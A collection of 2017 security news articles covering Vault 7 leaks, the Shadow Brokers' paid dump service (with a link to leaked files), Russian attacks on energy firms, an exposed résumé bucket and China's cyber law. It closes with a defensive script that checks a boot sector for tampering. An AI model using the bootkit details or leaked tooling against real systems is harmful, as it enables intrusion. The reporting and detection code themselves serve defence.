With countries around the world heavily reliant on computers for everything from defence systems to hospital equipment to critical infrastructure such as power stations, the cybersphere is seen as the next major theatre for conflict.

NATO now considers cyberspace to be a conflict domain alongside that of air, sea and land.

Alliance chief Jens Stoltenberg, who attended the exercise in Tallinn, said NATO had seen a 60 percent increase in cyber attacks on its networks over the last year.

In Tuesday's exercise, the 28 EU defence ministers were presented with an escalating crisis during an operation in the Mediterranean Sea similar to the current Sophia naval mission against people-smuggling networks.

"First a drone went down after a problem with the server at the military headquarters, then another drone was intercepted and then a more serious threat with a worm (computer virus)... and then more serious still with the loss of communications with our ships in the Mediterranean," Belgian Defence Minister Steven Vandeput explained.

The ministers were given tablet computers to answer multiple choice questions about how to respond to each fresh development.

"We are not creating programmers from the ministers but we want them to understand that these quickly developing situations could demand quick political decisions -- that's the idea of the exercise," Estonian Defence Minister Juri Luik said.

- 'Exciting' exercise -

Estonian officials said the aim was to improve ministers' understanding of the kinds of target that could be hit by a cyberattack, the effects such an attack could have and how they could respond -- as well as the need for clear, coordinated communication with the public on what can be a complex issue.

German Defence Minister Ursula von der Leyen said the two-hour exercise was "extremely exciting".

"The adversary is very, very difficult to identify. The attack is silent, invisible... it is cost-effective for the adversary because he does not need an army, but only a computer with internet connection," she said.

Estonia has made digital issues one of the priorities of its EU presidency, which runs until the end of this year, and Thursday's exercise was over a year in the planning.

Leyen said the drill showed the importance of "informing each other and to include the economy in case a major cyber attack spreads in critical infrastructure of the EU economy".

- Russian threat -

The devastating WannaCry ransomware attack that hit more than 200,000 users around the world in May, causing chaos in Britain's National Health Service and halting production at numerous factories, was a stark signal of hackers' power to wreak havoc.

But NATO and the EU are also on their guard against Russia deploying so-called hybrid tactics -- combining cyber warfare and misinformation as well as conventional boots on the ground -- as it did in Crimea to destabilise and ultimately annex a region.

In the last couple of years Lithuania and Latvia have warned they were coming under hybrid attack, accusing Moscow of waging a propaganda campaign to sow dissatisfaction among ethnic Russians in their territory.

Estonia itself was hit as far back as 2007 by one of the first major cyberattacks, suffering a blistering assault on official state and bank websites. The onslaught was blamed on Russian hackers, though the Kremlin denied involvement.

While getting ministers to think of cybersecurity at a strategic level was the key aim of Thursday's practice, Estonian officials stressed that proper resilience to hacking requires education across the whole population.

The vast majority of hacking attacks begin with a security breach from human action -- someone opening an email attachment or clicking a link that lets a virus infect their computer network.

Tanel Sepp, a senior cyber expert at the Estonian defence ministry, said children should be taught the principles of online safety in the same way they are taught to cross the road safely.


Is the Trump Administration Serious About Cybersecurity?

8.9.2017 securityweek BigBrothers

National Infrastructure Advisory Council (NIAC) Contains No Recognizable Cybersecurity Luminaries

In August, eight out of 28 members of President Trump's National Infrastructure Advisory Council (NIAC) resigned -- seven en masse on the day before publication of the council's draft report 'Addressing Urgent Cyber Threats to Critical Infrastructure', and an eighth at the end of the same week. These resignations beg an important question: what do the president's own advisors think of his approach to the security of America's critical infrastructure?

A resignation letter from the former NIAC members gives some clues: "Your actions have threatened the security of the homeland I took an oath to protect... You have given insufficient attention to the growing threats to the cybersecurity of the critical systems upon which all Americans depend, including those impacting the systems supporting our democratic election process."

The draft report, published the following day but clearly not endorsed by the resignees, provides further clues. Sqrrl director Matt Zanderigo had two major issues with it. First, the majority of recommendations are not new; and second, the recommendations are voluntary. Most security experts do not believe that voluntary proposals work -- they need to be enforced. Business leaders, however, tend to like proposals to be voluntary because they can be implemented, or not, with the minimum disruption to the business.

It is noticeable that the vast majority of the remaining members of the council are business leaders (many of them former business leaders). While the president's former Strategic and Policy Forum (a business advisory panel) included business luminaries such as Elon Musk and Disney's Robert Iger, and CEOs from JPMorgan Chase, Merck, Uber, Intel, and the Blackstone Group (all of whom resigned), NIAC contains no such immediately recognizable cybersecurity luminaries.

The question, then, is does President Trump actually understand cybersecurity issues, and is he serious about tackling them?

Opinions among security practitioners vary. Dana Simberkoff, chief risk, privacy and information security officer at AvePoint, wonders if it is ever possible to do enough to please everyone. "I think it's fair to say that no one country, company or industry can or will ever do "enough" to protect against cyberattacks," she told SecurityWeek. "Just as there is no such thing as perfect security, there will never be a strong enough cyber defense to withstand all potential attackers."

"Let's be clear," says Chris Roberts, chief security architect at Acalvio. "The resignations were not just about the state of critical infrastructure security. They were in response to a number of issues and were probably partially motivated by the fact a lot of people are assessing the impact of being with President Trump vs. sitting on the sidelines watching this whole mess unfold."

But he doesn't think that's the whole answer. "There is a huge concern in the community (both the NIAC and Energy/Natural Resource Committee to name a couple) have called into question the awareness and level of attentiveness demonstrated by the current administration when it comes to all things technical."

The concern seems to be, not that the administration is incapable of doing things -- Trump signed a new cybersecurity executive order in May, and raised USCYBERCOM to the status of a unified combatant command last month -- but that it fails to adequately follow up on them. "Signing something and then paying attention to it afterwards seem to be two very separate things. A lot of criticism has been leveled at him based on his lack of response on multiple occasions with regards to actually doing anything when it comes to securing our infrastructure, sorting out who did vote for him and other issues."

Andrew McDonnell, president at AsTech, has a similar view. For him, the problem is the very nature of NIAC. "From an information security perspective," he told SecurityWeek, "the federal government is continuing its track record of assigning accountability to leadership positions and groups without granting authority or leveling consequences to drive meaningful progress. While supporting decisive action is by no means trivial, it is an essential next step to clearly identifying and mitigating vulnerabilities that -- if exploited -- could lead to massive material harm."

The problem with NIAC and the administration is less that it doesn't know what to do -- nearly everybody associated with cybersecurity knows what needs to be done -- it is that it simply isn't providing the means to make sure that it gets done. At the same time, this lack of action from the administration must not be taken as an excuse for a lack of action among practitioners.

"Let's face it," says Roberts: "the boss is not paying attention, so we can either sit and complain about it all day or we can just get our heads down and fix things. That seems to be the problem. We want someone to tell us what to do, but we know what needs to happen and we know that defaults, passwords, segmentation and a host of other things have to be done. So why the hell don't we just bloody fix it and let the boss wander around doing nothing, as normal? We know what has/should be done to get things fixed so why are we waiting for someone to tell us what needs to happen? Oh, someone has to force us to collaborate? That's bullshit. Someone has to force us to prioritize? Again, BS. We know what needs to be done... just do it."


Wikileaks Unveils Project Protego: CIA's Secret Missile Control System
7.9.2017 thehackernews BigBrothers

Every week since March, Wikileaks has been leaking secrets from the United States Central Intelligence Agency (CIA), which mainly focus on surveillance techniques and hacking tools employed by its agents.
However, this time the whistleblower organisation has released something different from its previous Vault 7 leaks, because it's not about hacking and spying; instead, it's a missile control system.
Dubbed Project Protego, the PIC-based missile control system is installed on board a Pratt and Whitney Aircraft (PWA) equipped with a missile launch system, giving it the ability to hit air-to-air and air-to-ground targets.
The latest leak contains four secret documents in total from project Protego, along with "37 related documents (proprietary hardware/software manuals from Microchip Technology Inc)," WikiLeaks says.

Leaked documents reveal system design, a guide on how to configure and build Protego images, and also suggest that all micro-controller units exchange data and signals over encrypted and authenticated channels.
"The missile system has micro-controllers for the missile itself ('Missile Smart Switch', MSS), the tube ('Tube Smart Switch', TSS) and the collar (which holds the missile before and at launch time)."
The missile launches only when the Master Processor (MP) unit receives three valid signals from a beacon, including 'In Border,' 'Valid GPS,' and 'No End of Operational Period.'
WikiLeaks is not sure why the secret documents of project Protego were part of repositories belonging to the CIA's Engineering Development Group, which is known for developing malware and hacking tools for the agency.
Notably, however, the CIA developed the Protego missile control system in partnership with a major U.S. defence contractor, Raytheon, which was also mentioned in a previous CIA leak.
Raytheon is the same company that the agency hired to analyse advanced malware and hacking techniques being used in the wild by hackers and cyber criminals.
It seems the name Protego was inspired by the magical Shield Charm used in the Harry Potter movies, which protects against physical as well as magical attacks.
If so, the primary objective of this missile control system could be to defend something (a secret facility or base) from external physical attacks.
Previous Vault 7 Leaks
Last week, WikiLeaks published another CIA project, dubbed AngelFire, an implant developed by the agency to plant a persistent backdoor on target Windows computers by modifying their partition boot sector.
Since March, WikiLeaks has published 23 batches of the "Vault 7" series, which include this week's and last week's leaks, along with the following batches:
ExpressLane — detailed about the spying software that the agency used to spy on their intelligence partners around the world, including the FBI, DHS and NSA.
CouchPotato — A CIA project that revealed its ability to spy on video streams remotely in real-time.
Dumbo — A CIA project that revealed the CIA's ability to hijack and manipulate microphones and webcams to corrupt or delete recordings.
Imperial — A CIA project that disclosed details of at least 3 CIA-developed hacking tools and implants designed to target computers which run Apple Mac OS X and different flavours of Linux OS.
UCL/Raytheon — A CIA contractor, which analysed in-the-wild advanced malware and hacking tools to help the agency develop its own malware.
Highrise — An alleged CIA project that let the spying agency stealthily collect and send stolen data from compromised smartphones to its server through SMS.
BothanSpy and Gyrfalcon — Two implants that allowed the CIA agents to intercept and exfiltrate SSH credentials from targeted Windows and Linux systems using different attack vectors.
OutlawCountry — An alleged CIA project that let the spying agency hack and remotely spy on PCs running Linux OS.
ELSA — Alleged CIA malware that allows the agency to track geolocation of targeted laptops and PCs running the Microsoft Windows OS.
Brutal Kangaroo — An alleged tool suite for the Microsoft Windows operating system used by CIA agents to target air-gapped computers within an organisation or enterprise without needing any direct access.
Cherry Blossom — A framework employed by the CIA to monitor the Internet activity of the targeted systems by exploiting vulnerabilities in Wi-Fi devices.
Pandemic — A CIA project that allowed the US intelligence agency to turn Windows file servers into covert attack machines that can silently infect other systems inside the same network.
Athena — A framework that the agency designed to remotely spy on and take full control of infected Windows systems; it works on every version of Windows OS, from Windows XP to Windows 10.
AfterMidnight and Assassin — Two alleged CIA malware frameworks for Microsoft Windows that are designed to monitor and report back actions on the infected remote host PC and execute malicious tasks.
Archimedes — Man-in-the-middle attack tool allegedly developed by the spying agency to target PCs inside a Local Area Network (LAN).
Scribbles — Software allegedly designed to embed 'web beacons' into confidential documents, making the CIA agents able to track insiders and whistleblowers.
Grasshopper — A framework which let the spying agency easily create custom malware for breaking into Windows operating system and bypassing antivirus protection.
Marble — Source code of a secret anti-forensic tool used by the spying agency to hide the actual source of its malware.
Dark Matter — Several hacking exploits the spying agency designed to target iPhones and Macs.
Weeping Angel — A spying tool used by the intel agency to infiltrate smart TVs and transform them into covert microphones.
Year Zero — CIA hacking exploits for popular hardware as well as software.


Shadow Brokers Release Tool Used by NSA to Hack PCs

7.9.2017 securityweek  BigBrothers
The hacker group calling itself Shadow Brokers continues to release tools and exploits allegedly stolen from the U.S. National Security Agency (NSA), including a sophisticated espionage platform that can be used to take full control of targeted computers.

In the past year, Shadow Brokers has apparently tried to make a significant amount of money by offering to sell various tools and exploits used by the Equation Group, a cyber espionage actor linked by researchers to the NSA.

After several failed attempts, the Shadow Brokers’ latest offer involves monthly leaks for which interested parties have to pay a fee ranging between 100 Zcash (roughly $24,000) and 16,000 Zcash (roughly $3.8 million) -- older dumps can be acquired for a few hundred Zcash while the price of future dumps will increase exponentially. An analysis of their cryptocurrency addresses showed that the hackers have made at least tens of thousands of dollars from the monthly dump service.

With the September release, announced on Wednesday, Shadow Brokers informed interested entities that they will offer two dumps every month, and that Monero digital currency is no longer accepted.

While the content of each leak is not disclosed, one of the files made available for free this month, a user manual, suggests that last month’s dump included an NSA tool known as UNITEDRAKE.

UNITEDRAKE is a modular platform that allows users to take complete control of a Windows machine. It was one of the tools mentioned by The Intercept in 2014 when it started releasing files from NSA whistleblower Edward Snowden.

The tool was also detailed in February 2015 by Kaspersky Lab in the first report to link tools detailed in Snowden documents to a cyberespionage group, namely the Equation Group.

Kaspersky tracked UNITEDRAKE as EquationDrug, whose successor was GrayFish. The security firm said EquationDrug and GrayFish were used between 2003 and 2014, and described them as the most sophisticated espionage platforms used by the Equation Group.

Nicholas Weaver @ncweaver, 6 Sep:
Probably because their yanking of the NSA's chain is a lot easier with pre seeded files so they can dump PW later. https://twitter.com/josephfcox/status/905332685081587713 …

Nicholas Weaver @ncweaver, 1:18 PM - Sep 6, 2017:
In particular, dumping UNITEDRAKE would be interesting: Might end up outing major NSA operations by enabling attribution.

Some pointed out that screenshots included in the UNITEDRAKE manual appear to show that the NSA had used McAfee antivirus based on the presence of the McAfee agent icon in the taskbar. However, it’s worth pointing out that, for several years, a limited version of the McAfee antivirus was installed alongside Adobe Flash Player if users neglected to untick a box during installation.

The Shadow Brokers claim this month’s dump contains exploits, but experts doubt too many people are willing to pay the increasingly significant amounts of money, especially since at least one previous subscriber complained that they only received a worthless tool after paying tens of thousands of dollars.

Jake Williams @MalwareJake, 6 Sep (replying to @MalwareJake):
Maybe I'm wrong, but I don't see people shelling out mad cash for files that history has shown they'll release the password to eventually.

Jake Williams @MalwareJake:
16000 ZEC at today's rate is $3.8 million. That's just stupid. Nobody is paying that for unknown tools/data. pic.twitter.com/4wbMYv9G7C

A group of researchers did try to launch a crowdfunding initiative back in May in an effort to raise money for the monthly dumps, but they ended up canceling the project due to legal reasons.


ShadowBrokers are back demanding nearly $4m and offering 2 dumps per month
6.9.2017 securityaffairs BigBrothers

The dreaded hacking group ShadowBrokers posted a new message, promising to deliver two data dumps a month as part of its monthly dump service.
The notorious group ShadowBrokers is back, announcing interesting changes to their Dump Service.

The hackers published a new message on the Steemit platform announcing the changes to their service.

“Missing theshadowbrokers? If someone is paying then theshadowbrokers is playing.”

The hacker group made headlines in April after publicly leaking exploits allegedly stolen from the NSA-Linked group Equation Group.

The changes for the Dump Service included 2 dumps per month and the possibility to pay only with ZCash cryptocurrency:

Two dumps per month
Zcash only, no Monero, delivery email in encrypted memo field
Delivery email address clearnet only, recommend tutanota or protonmail, no need exchange secret, no i2p, no bitmessage, no zeronet
Previous dumps now available, send correct amount to correct ZEC address
September dumps is being exploit
Below is the "price list" shared by the group; it includes old dumps and future dumps, from June 30 until November 15.

ShadowBrokers dump

The amount of money requested by ShadowBrokers has increased substantially compared to the initial demand of 100 ZEC (~24k USD) in June, when the hackers started their first monthly dump service. Now, the hackers are offering the exploits for 16,000 ZEC, which amounts to $3,914,080.

ShadowBrokers leaked the manual for the NSA tool dubbed UNITEDRAKE, one of the implants used by the NSA's elite hacking unit TAO (Tailored Access Operations).

Joseph Cox @josephfcox (replying to @josephfcox):
(Typo: United Rake)

Joseph Cox @josephfcox, 9:55 AM - Sep 6, 2017:
Here's UNITED RAKE (Windows tool) from the Shadow Brokers dump mentioned in a Snowden document https://search.edwardsnowden.com/search?codewords_facet=UNITEDRAKE … pic.twitter.com/Drljghk9Ka

According to the leaked manual, the UNITEDRAKE implant is a "fully extensible remote collection system designed for Windows targets".

Rickey Gevers @UID_, 10:32 AM - Sep 6, 2017:
BREAK! #ShadowBrokers just leaked the manual for #UNITEDRAKE http://docdro.id/iJbxyYx

Rickey Gevers @UID_, 10:49 AM - Sep 6, 2017:
Turns out Kaspersky had a post about UNITEDRAKE dated March 11th 2015. They called UNITEDRAKE EquationDrug. https://securelist.com/inside-the-equationdrug-espionage-platform/69203/ …

Files, Signed Message, Manual to August Dump:

https://mega.nz/#F!QGAyVTJL!0cJlvWpQ4dPcKLu-oN766w


Hackers Target Control Systems in U.S. Energy Firms: Symantec

6.9.2017 securityweek BigBrothers
A group of cyberspies believed to be operating out of Russia has been observed targeting energy facilities in the United States and other countries, and the attackers appear to be increasingly interested in gaining access to the control systems housed by these organizations.

The group, known as Dragonfly, Crouching Yeti and Energetic Bear, has been active since at least 2010, but its activities were first detailed by security firms in 2014. Many of the threat actor’s attacks have focused on the energy sector in the United States and Europe.

Symantec says it has been monitoring a new campaign, which it has dubbed “Dragonfly 2.0,” since late 2015. The company has spotted victims of this operation in the United States, Switzerland and Turkey.

Symantec first warned about Dragonfly’s potential power grid sabotage capabilities in 2014. However, there has been no evidence that any of the group’s attacks resulted in power disruptions. The company now claims to have found evidence that may suggest the attackers have actually gained access to computers linked to operational systems.

The FBI and the DHS recently issued a joint report to warn manufacturing plants, nuclear power stations and other energy facilities in the U.S. of attacks that may have been launched by Dragonfly. However, the U.S. Department of Energy said only administrative and business networks were impacted, not systems controlling the energy infrastructure.

Symantec pointed out that Dragonfly’s initial campaigns appeared to focus on breaching the targeted organizations’ networks. However, in more recent attacks, the hackers seemed interested in learning how energy facilities operate and gaining access to operational systems. Experts warned that access to operational systems could be used in the future for more disruptive purposes, including to cause power outages.

However, the most “concerning evidence” presented by the security firm involves screen captures taken by the group’s malware. Some screen capture files analyzed by researchers had names containing the location and a description of the infected machine and the targeted organization’s name. Some of the machine descriptions included the string “cntrl,” which may mean that the compromised machine had access to control systems.

Experts previously linked Dragonfly to Russia. Symantec has not made any clear statements regarding the threat actor’s location, but it did say that some of the malware code was in Russian. However, researchers also reported finding strings written in French, which suggests that the attackers may be trying to throw investigators off track.

Symantec has linked the Dragonfly 2.0 attacks to earlier Dragonfly campaigns based on the use of watering holes, phishing emails, trojanized applications, and the same malware families, including the Heriplor backdoor that appears to be exclusively used by this group.


Details of U.S. 'Top Secret' Clearance Holders Leaked Online

5.9.2017 securityweek BigBrothers
The personal details of thousands of individuals who submitted job applications to an international security firm were exposed online due to an unprotected storage server set up by a recruiting services provider.

Chris Vickery of cyber resilience firm UpGuard discovered on July 20 an Amazon Web Services (AWS) S3 storage bucket that could be accessed by anyone over the Internet. The server stored more than 9,400 documents, mostly representing resumes of people who had applied for a job at TigerSwan, an international security and global stability firm.

The documents included information such as names, physical addresses, email addresses, phone numbers, driver’s license numbers, passport numbers and at least partial social security numbers (SSNs). In many cases, the resumes also provided information on security clearances from U.S. government agencies, including the Department of Defense, the Secret Service, and the Department of Homeland Security. Nearly 300 of the exposed resumes listed the applicant as having a “Top Secret/Sensitive Compartmented Information” clearance.

According to UpGuard, a majority of the individuals whose information was compromised were military veterans, but hundreds of resumes belonged to law enforcement officers who had sought a job at TigerSwan, a company recently described by The Intercept as a “shadowy international mercenary and security firm.”

The list of affected people also includes a former United Nations worker, an active Secret Service agent, a parliamentary security officer from Eastern Europe, and a logistical expert from Central Africa.

UpGuard also highlighted that some of the individuals whose details have been leaked are Iraqi and Afghan nationals who worked with U.S. and Coalition forces. Experts believe the leak could pose a serious risk to these individuals if someone other than UpGuard found the unprotected storage server.

UpGuard informed TigerSwan about the leak on July 21, but the files were left unprotected until August 24. In a statement published on its website, TigerSwan clarified that the files were exposed by TalentPen, a recruiting firm whose services it had used between 2008 and February 2017.

TigerSwan said it initially believed that UpGuard’s warnings via email and phone were part of a phishing attack, especially since the notifications came shortly after the WannaCry and NotPetya malware outbreaks and the URLs provided by the cybersecurity firm were not linked to TigerSwan. The company realized that UpGuard’s claims were legitimate only on August 31, when it was contacted by reporters, but by that time the storage server had been secured by TalentPen.

TigerSwan says it’s in the process of contacting affected individuals. The company has advised people who submitted a resume on its website between 2008 and 2017 to call a hotline (919-274-9717) to find out if they are impacted by the incident.

In order to help prevent these types of leaks, Amazon recently announced the launch of Macie, a new security service designed to help AWS users protect sensitive data.


Thousands resumes of US military and intel contractors left unsecured on an Amazon server
4.9.2017 securityaffairs BigBrothers

Experts discovered thousands of files containing personal data on former US military, intelligence, and government workers exposed online for months.
Researchers from cybersecurity company UpGuard have discovered that thousands of files containing personal data on former US military, intelligence, and government workers were allegedly exposed online for months.

The data breach was initially attributed to the security firm TigerSwan, but the company confirmed that it had outsourced the processing of new job applicants to the recruitment vendor TalentPen. The data include addresses, phone numbers, and private email accounts.

According to Gizmodo.com, some 9,400 sensitive files were accessible to anyone on a misconfigured Amazon cloud server in a folder called “resumes.”

Some of the exposed profiles belong to holders of classified or Top Secret security clearances who applied for work at the notorious security firm TigerSwan.

The exposed documents included CVs of thousands of US citizens, many of them might have worked with the US military and US intelligence agencies (i.e. Central Intelligence Agency, the National Security Agency, US Secret Service).

“The UpGuard Cyber Risk Team can now disclose that a publicly accessible cloud-based data repository of resumes and applications for employment submitted for positions with TigerSwan, a North Carolina-based private security firm, were exposed to the public internet, revealing the sensitive personal details of thousands of job applicants, including hundreds claiming “Top Secret” US government security clearances.” states a blog post published by UpGuard. “TigerSwan has recently told UpGuard that the resumes were left unsecured by a recruiting vendor that TigerSwan terminated in February 2017. If that vendor was responsible for storing the resumes on an unsecured cloud repository, the incident again underscores the importance of qualifying the security practices of vendors who are handling sensitive information.”

The impact of the data leak could be severe, since some applicants were involved in highly classified US military operations.

According to the firm UpGuard, at least one of the applicants claimed he was charged with the transportation of nuclear activation codes and weapons components.

“One applicant referenced his employment as a “warden advisor” at the infamous Abu Ghraib black site near Baghdad, where prisoners are known to have been tortured. The applicant described his job as “establishing safe and secure correctional facilities for the humane care, custody, and treatment of persons incarcerated in the Iraqi corrections system.”” reported Gizmodo.com.

“Another applicant reportedly stated that he was involved in “enhancing evidence” against Iraqi insurgents during the war. Others, who provided their home addresses, as well as personal email accounts and phone numbers, were employed and may be currently employed by US spy agencies for work on Top Secret surveillance and intelligence-gathering operations.”


The private security firm TigerSwan confirmed that its systems were not hacked.
“At no time was there ever a data breach of any TigerSwan server,” TigerSwan said. “All resume files in TigerSwan’s possession are secure. We take seriously the failure of TalentPen to ensure the security of this information and regret any inconvenience or exposure our former recruiting vendor may have caused these applicants.”

The exposed S3 bucket was discovered by the well-known data breach hunter Chris Vickery. He confirmed that the data was found in July but, unfortunately, was only removed from the cloud server at the end of August.

In August, Vickery discovered that more than 1.8 million voter records belonging to Americans had been accidentally leaked online by a US voting machine supplier serving dozens of US states.

In June, Vickery discovered that a top defense contractor had left tens of thousands of sensitive Pentagon documents on an Amazon server without any protection in place.

Chris Vickery has discovered many other high-profile cases of databases left exposed on the Internet. In July he discovered data belonging to 14 million U.S.-based Verizon customers that had been exposed on an unprotected AWS server by a partner of the telecommunications company. In December 2015 the security expert discovered 191 million records belonging to US voters online, and in April 2016 he also discovered a 132 GB MongoDB database open online and containing 93.4 million Mexican voter records.

In March 2016, Chris Vickery discovered online the database of the Kinoptic iOS app, which had been abandoned by its developers, with details of over 198,000 users.

In January 2017, the expert discovered online an open Rsync server hosting the personal details for at least 200,000 IndyCar racing fans.

In March, he announced a data leak of 1.37 billion records, and in June 2017 Vickery revealed that the firm DRA had left 1.1 TB of data unsecured on Amazon S3, exposing 198 million US voter records.


Chinese cyber security law will allow China to use zero-day knowledge for its intelligence
4.9.2017 securityaffairs BigBrothers

According to the Chinese Cyber Security law, the information obtained by the CNNVD could be used in intelligence operations.
The new Chinese cyber security law will allow the Government to analyze the source code and any intellectual property of foreign tech companies working in the country.

The Chinese cyber security law was presented as focused on the protection of Chinese users’ data, but a closer reading of the bill makes it easy to imagine its devastating effects on foreign companies and their technologies.

According to the threat intelligence firm Recorded Future, the analysis will be assigned to the China Information Technology Evaluation Center (CNITSEC), an office within the Ministry of State Security (MSS).

Recorded Future’s experts fear that the results of the analysis conducted by CNITSEC could be used to discover vulnerabilities in the code used by tech firms and to exploit them in intelligence operations.

“According to academic research published in China and Cybersecurity: Espionage, Strategy, and Politics in the Digital Domain, CNITSEC is run by the MSS and houses much of the intelligence service’s technical cyber expertise.” reads a blog post published by Recorded Future. “CNITSEC is used by the MSS to “conduct vulnerability testing and software reliability assessments.” Per a 2009 U.S. State Department cable, it is believed China may also use vulnerabilities derived from CNITSEC’s activities in intelligence operations. CNITSEC’s Director, Wu Shizhong, even self-identifies as MSS, including for his work as a deputy head of China’s National Information Security Standards Committee as recently as January 2016.”


CNITSEC also runs the China National Vulnerability Database of Information Security (CNNVD), which is the nation’s information security assessment center.

The CNNVD is similar to the NVD run by the US National Institute of Standards and Technology (NIST); it is tasked with the construction, operation, and maintenance of the national information security vulnerability data management platform.

Researchers believe that this organization will not operate simply to publicly identify, report, and create security patches for software vulnerabilities.

“This means that the MSS is using the broad language and new authorities in China’s cybersecurity law to possibly gain access to vulnerabilities in foreign technologies that they could then exploit in their own intelligence operations.” states Recorded Future. “The MSS has a voice in which vulnerabilities are reported via the CNNVD, because they run it; they could also easily identify and hide from the public a critical weakness in software or hardware, then turn around and use it in their own operations.”

Tech companies are effectively blackmailed by the Chinese government: to offer their services and solutions in one of the world’s most important markets, they will have to share information on their proprietary technology and IP.

Recorded Future has published an interesting paper that is focused on the impact of the Chinese cyber security law on firms that intend to do business in the country, the analysis also provides practical advice to the firms.

“Recorded Future’s research has focused on the broad powers the cybersecurity law gives to the China Information Technology Evaluation Center (CNITSEC), an office in China’s premier foreign intelligence service, the Ministry of State Security (MSS). The law gives “network information departments,” including CNITSEC, the power to conduct “national security reviews” (see Article 35) of technology that foreign companies want to use or sell in the Chinese market.” states the paper published by RecordedFuture.

“The MSS’s integration into the information security architecture of China via CNITSEC will (1) possibly allow it to identify vulnerabilities in foreign technologies that China could then exploit in their own intelligence operations, and (2) create an impossible choice for foreign companies between giving their proprietary technology or intellectual property to the MSS and being cut out of the mainland Chinese information technology market, which is projected to reach $242 billion in 2018.”

Recorded Future describes the Chinese Cyber Security Law as broad and its language as vague.

“It is important for companies to note the imprecision and breadth of the CSL as well as the 2015 National Security Law, because both contain vague language that can be invoked by Chinese authorities to compel national security reviews, data sharing with government authorities, and even inspections into proprietary technology or intellectual property.” continues the analysis.

The experts believe that the poorest-defined section of the law is “Chapter Three: Network Operations Security.” The chapter includes 18 articles which define the “network security protection” responsibilities of “network operators” and additional legal responsibilities for companies that operate “critical information infrastructure.”

The impact on foreign businesses is already severe, considering the measures adopted by tech giants like IBM and Apple.

IBM has agreed to build servers for Larkspur to offer services to the Chinese banking industry, while Apple has removed iOS VPN apps from the Chinese App Store in compliance with censorship law.

Returning to the MSS powers: the fact that the MSS could discover and operationalize vulnerabilities in proprietary products or services implies the following risks for companies, which must be carefully considered.

Risk to a company’s own machines or networks.
Risk to a company’s product or service.
Derivative risk to customers, clients, or users around the world.


CIA's "AngelFire" Modifies Windows' Boot Sector to Load Malware

31.8.2017 securityweek BigBrothers
Wikileaks on Thursday published documents detailing AngelFire, a tool allegedly used by the U.S. Central Intelligence Agency (CIA) to load and execute implants on Windows-based systems.

Similar to other “Vault7” tools that Wikileaks unveiled over the past several months, such as Grasshopper and AfterMidnight, AngelFire is a persistent framework targeting computers running Windows XP and Windows 7.

According to the published documents, the framework consists of five components: Solartime, Wolfcreek, Keystone (previously called MagicWand), BadMFS, and the Windows Transitory File system.

Solartime was designed to modify the partition boot sector so as to load the Wolfcreek implant when Windows loads boot-time device drivers. Wolfcreek is a self-loading driver that can load additional drivers and user-mode applications after execution. Loading additional implants creates memory leaks that could be detected on infected machines.

Part of the Wolfcreek implant, Keystone is responsible for starting malicious user applications. The leaked documents also reveal that the implants are loaded directly into memory and they never touch the file system. The created processes are named svchost.exe and all of their properties are consistent with a real instance of svchost.exe, including image path and parent process.

BadMFS is a covert file system created at the end of the active partition and used to store (encrypted and obfuscated) all drivers and implants launched by Wolfcreek. Some versions of the library can be detected because a reference to it is stored in a file named "zf".

The Windows Transitory File system was meant as a new method of installing AngelFire, allowing an operator to create transitory files (instead of laying independent components on disk) for actions such as installation, adding files to, or removing files from AngelFire. These transitory files are added to the 'UserInstallApp'.
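A defender-side check tied to the Solartime description above, added here as an example and not code from the leaked documents or from Wikileaks: it compares a volume boot record read from disk against a trusted baseline and flags the case where only the bootstrap code region changed while the BIOS parameter block stayed intact, which is the profile of a boot-path hook rather than a reformat. The sample VBR images are constructed inline, and `read_vbr` is a hypothetical helper for reading the real sector.

```python
import hashlib
from typing import List, Optional

SECTOR_SIZE = 512
BOOT_SIGNATURE = b"\x55\xAA"
CODE_START = 0x54          # first byte of bootstrap code in an NTFS VBR
SIGNATURE_OFFSET = 0x1FE   # 2-byte 0x55AA marker at the end of the sector


def parse_vbr(sector: bytes) -> dict:
    """Split a 512-byte NTFS-style volume boot record into its regions.

    NTFS layout: 0x00 jump (3 bytes), 0x03 OEM ID (8 bytes), 0x0B BIOS
    parameter block and extended BPB (up to 0x53), 0x54 bootstrap code,
    0x1FE boot signature.
    """
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected exactly one 512-byte sector")
    return {
        "jump": sector[0:3],
        "oem_id": sector[3:11],
        "bpb": sector[11:CODE_START],
        "boot_code": sector[CODE_START:SIGNATURE_OFFSET],
        "signature": sector[SIGNATURE_OFFSET:SECTOR_SIZE],
    }


def first_diff_offset(a: bytes, b: bytes) -> Optional[int]:
    """Return the first offset at which two byte strings differ, or None."""
    for i, (x, y) in enumerate(zip(a, b)):
        if x != y:
            return i
    return None if len(a) == len(b) else min(len(a), len(b))


def check_vbr(current: bytes, baseline: bytes) -> List[str]:
    """Compare a freshly read VBR against a trusted baseline and report findings.

    A bootkit that hooks the boot path (as Solartime is described to do) must
    change the bootstrap code but has every reason to leave the BPB intact so
    the volume still mounts normally; that combination is called out explicitly.
    """
    cur, base = parse_vbr(current), parse_vbr(baseline)
    findings: List[str] = []
    if cur["signature"] != BOOT_SIGNATURE:
        findings.append("boot signature is not 0x55AA; sector is not a valid VBR")
    if cur["oem_id"] != base["oem_id"]:
        findings.append(f"OEM ID changed: {base['oem_id']!r} -> {cur['oem_id']!r}")
    if cur["jump"] != base["jump"]:
        findings.append("entry jump instruction changed")
    bpb_changed = cur["bpb"] != base["bpb"]
    if bpb_changed:
        findings.append("BIOS parameter block changed")
    if cur["boot_code"] != base["boot_code"]:
        off = CODE_START + first_diff_offset(cur["boot_code"], base["boot_code"])
        digest = hashlib.sha256(cur["boot_code"]).hexdigest()[:16]
        msg = f"bootstrap code changed (first difference at offset 0x{off:X}, sha256 {digest}...)"
        if not bpb_changed:
            msg += "; BPB untouched, consistent with a boot-path hook rather than a reformat"
        findings.append(msg)
    return findings


def read_vbr(volume_path: str) -> bytes:
    """Hypothetical helper: read the first sector of a volume.

    On Windows the raw volume is opened as r"\\.\C:" (administrator rights required).
    """
    with open(volume_path, "rb") as fh:
        return fh.read(SECTOR_SIZE)


# ---- constructed sample data (not taken from any real disk) -----------------
def build_sample_vbr(code_fill: int) -> bytes:
    """Assemble an NTFS-shaped VBR whose bootstrap region is filled with one
    byte value, so two samples differ only in their boot code."""
    jump = b"\xEB\x52\x90"                     # JMP short + NOP, as on real NTFS
    oem_id = b"NTFS    "
    bpb = bytes(range(CODE_START - 0x0B))      # 73 bytes of placeholder BPB
    boot_code = bytes([code_fill]) * (SIGNATURE_OFFSET - CODE_START)
    return jump + oem_id + bpb + boot_code + BOOT_SIGNATURE


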